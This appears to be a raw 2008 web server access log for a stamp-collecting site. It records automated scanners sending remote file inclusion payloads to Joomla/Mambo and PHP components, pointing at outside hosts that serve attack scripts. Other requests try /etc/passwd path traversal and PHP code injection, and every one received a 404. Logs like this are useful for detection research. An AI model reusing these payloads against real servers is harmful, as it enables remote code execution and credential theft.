85.114.135.126 - - [20/Jul/2008:19:25:45 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.114.135.126 - - [20/Jul/2008:19:26:35 -0700] "GET /logs/access_080616.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.18.5.126 - - [20/Jul/2008:19:26:43 -0700] "GET /logs/access_080505.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.18.5.126 - - [20/Jul/2008:19:26:43 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.18.5.126 - - [20/Jul/2008:19:26:43 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:27:43 -0700] "GET /logs/access.log/errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:27:43 -0700] "GET /errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:27:59 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.18.5.126 - - [20/Jul/2008:19:28:17 -0700] "GET /logs/access_080428.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:28:33 -0700] "GET /logs/access.log/errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:28:33 -0700] "GET /logs/access.log/errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:28:33 -0700] "GET /errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:28:33 -0700] "GET /errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:28:34 -0700] "GET /logs/access.log/errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:28:34 -0700] "GET /errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:28:34 -0700] "GET /logs/errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:29:22 -0700] "GET /logs/access.log/errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:29:22 -0700] "GET /logs/access.log/errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:29:23 -0700] "GET /errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:29:23 -0700] "GET /errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:29:23 -0700] "GET /logs/errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:29:23 -0700] "GET /logs/errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:29:31 -0700] "GET /errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:29:32 -0700] "GET /errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:29:32 -0700] "GET /errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.114.135.126 - - [20/Jul/2008:19:30:08 -0700] "GET /logs/access_080609.log/components/com_performs/performs.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.45.177.194 - - [20/Jul/2008:19:30:30 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:30:54 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:30:54 -0700] "GET /lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:31:35 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:31:35 -0700] "GET /lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:31:35 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:32:09 -0700] "GET /lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.76.116.20 - - [20/Jul/2008:19:32:10 -0700] "GET /logs/access_080623.log/components/com_galleria/galleria.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.76.116.20 - - [20/Jul/2008:19:32:10 -0700] "GET /components/com_galleria/galleria.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.76.116.20 - - [20/Jul/2008:19:32:10 -0700] "GET /logs/components/com_galleria/galleria.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:32:15 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:32:15 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:32:15 -0700] "GET /lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:32:15 -0700] "GET /lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:33:02 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:33:02 -0700] "GET /lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:33:02 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:33:02 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:33:03 -0700] "GET /lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:33:03 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:33:12 -0700] "GET /lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:33:12 -0700] "GET /lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.76.116.20 - - [20/Jul/2008:19:33:27 -0700] "GET /logs/access_080512.log/components/com_galleria/galleria.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.18.5.126 - - [20/Jul/2008:19:33:33 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.18.5.126 - - [20/Jul/2008:19:33:33 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.18.5.126 - - [20/Jul/2008:19:33:33 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:33:37 -0700] "GET /logs/access_080630.log/errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.151.211 - - [20/Jul/2008:19:34:58 -0700] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.devilhouse.org/id.priv8.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.mathstamps.com"
207.58.151.211 - - [20/Jul/2008:19:34:58 -0700] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.devilhouse.org/id.priv8.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:19:35:56 -0700] "GET /logs/access_080324.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:19:35:56 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:19:35:56 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:19:36:30 -0700] "GET /logs/access_080428.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:36:30 -0700] "GET /logs/access_080324.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:36:30 -0700] "GET /logs/access_080324.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:36:30 -0700] "GET /logs/access_080324.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:36:30 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:36:30 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:36:30 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:36:30 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:36:30 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:36:30 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.45.177.194 - - [20/Jul/2008:19:36:46 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.45.177.194 - - [20/Jul/2008:19:36:46 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:37:08 -0700] "GET /logs/access_080428.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:37:08 -0700] "GET /logs/access_080428.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:37:08 -0700] "GET /logs/access_080428.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:38:18 -0700] "GET /logs/access_080630.log/errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.45.177.194 - - [20/Jul/2008:19:38:22 -0700] "GET /logs/access_080428.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:38:51 -0700] "GET /logs/access_080630.log/errors.php?error=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.215.205 - - [20/Jul/2008:19:39:40 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
91.151.100.50 - - [20/Jul/2008:19:43:39 -0700] "GET /logs/access_080602.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
91.151.100.50 - - [20/Jul/2008:19:43:40 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
91.151.100.50 - - [20/Jul/2008:19:43:40 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
81.2.200.22 - - [20/Jul/2008:19:43:54 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
81.2.200.22 - - [20/Jul/2008:19:43:56 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
81.2.200.22 - - [20/Jul/2008:19:43:56 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
91.151.100.50 - - [20/Jul/2008:19:43:57 -0700] "GET /logs/access_080505.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:19:44:02 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:19:44:02 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:19:44:02 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:19:44:08 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
81.2.200.22 - - [20/Jul/2008:19:44:09 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:45:00 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.79.75.195 - - [20/Jul/2008:19:45:21 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:45:28 -0700] "GET /logs/access_080421.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:45:28 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:45:28 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:47:32 -0700] "GET /logs/access_080602.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.206.166.49 - - [20/Jul/2008:19:47:46 -0700] "GET /logs/access_080630.log/include/bbs.lib.inc.php?site_path=http://sai-ken.com/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
61.206.166.49 - - [20/Jul/2008:19:47:47 -0700] "GET /include/bbs.lib.inc.php?site_path=http://sai-ken.com/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
61.206.166.49 - - [20/Jul/2008:19:47:47 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://sai-ken.com/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.20.76.152 - - [20/Jul/2008:19:49:27 -0700] "GET /logs/access_080519.log/joomla/index.php?option=com_restaurante&task=http://118.98.168.138/xpl/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
209.20.76.152 - - [20/Jul/2008:19:49:27 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://118.98.168.138/xpl/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
209.20.76.152 - - [20/Jul/2008:19:49:27 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://118.98.168.138/xpl/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
209.20.76.152 - - [20/Jul/2008:19:49:27 -0700] "GET /logs/access_080505.log/joomla/index.php?option=com_restaurante&task=http://118.98.168.138/xpl/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
61.206.166.49 - - [20/Jul/2008:19:50:32 -0700] "GET /logs/access.log/include/bbs.lib.inc.php?site_path=http://sai-ken.com/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:19:54:15 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:19:54:15 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:19:54:38 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:19:54:38 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:19:54:38 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:19:54:54 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:19:55:18 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:22 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:22 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:22 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:22 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:22 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
